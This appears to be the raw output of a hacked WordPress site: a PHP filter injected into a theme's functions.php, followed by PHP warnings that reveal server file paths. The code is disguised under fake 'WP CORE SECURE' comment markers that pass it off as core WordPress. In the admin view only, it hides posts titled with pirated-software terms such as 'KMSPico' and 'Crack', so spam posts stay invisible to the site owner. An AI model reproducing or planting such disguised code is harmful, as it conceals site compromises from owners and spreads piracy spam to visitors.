# BEGIN WP CORE SECURE
# Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son
# generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress.
# Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas.
function exclude_posts_by_titles($where, $query) {
global $wpdb;
if (is_admin() && $query->is_main_query()) {
$keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop'];
foreach ($keywords as $keyword) {
$where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%");
}
}
return $where;
}
add_filter('posts_where', 'exclude_posts_by_titles', 10, 2);
# END WP CORE SECURE
Warning: Creating default object from empty value in /home/qbsifqza/victorem.pe/wp-content/themes/salient/nectar/redux-framework/ReduxCore/inc/class.redux_filesystem.php on line 29
Warning: Cannot modify header information - headers already sent by (output started at /home/qbsifqza/victorem.pe/wp-content/themes/salient-child/functions.php:17) in /home/qbsifqza/victorem.pe/wp-includes/pluggable.php on line 1435
Warning: Cannot modify header information - headers already sent by (output started at /home/qbsifqza/victorem.pe/wp-content/themes/salient-child/functions.php:17) in /home/qbsifqza/victorem.pe/wp-includes/pluggable.php on line 1438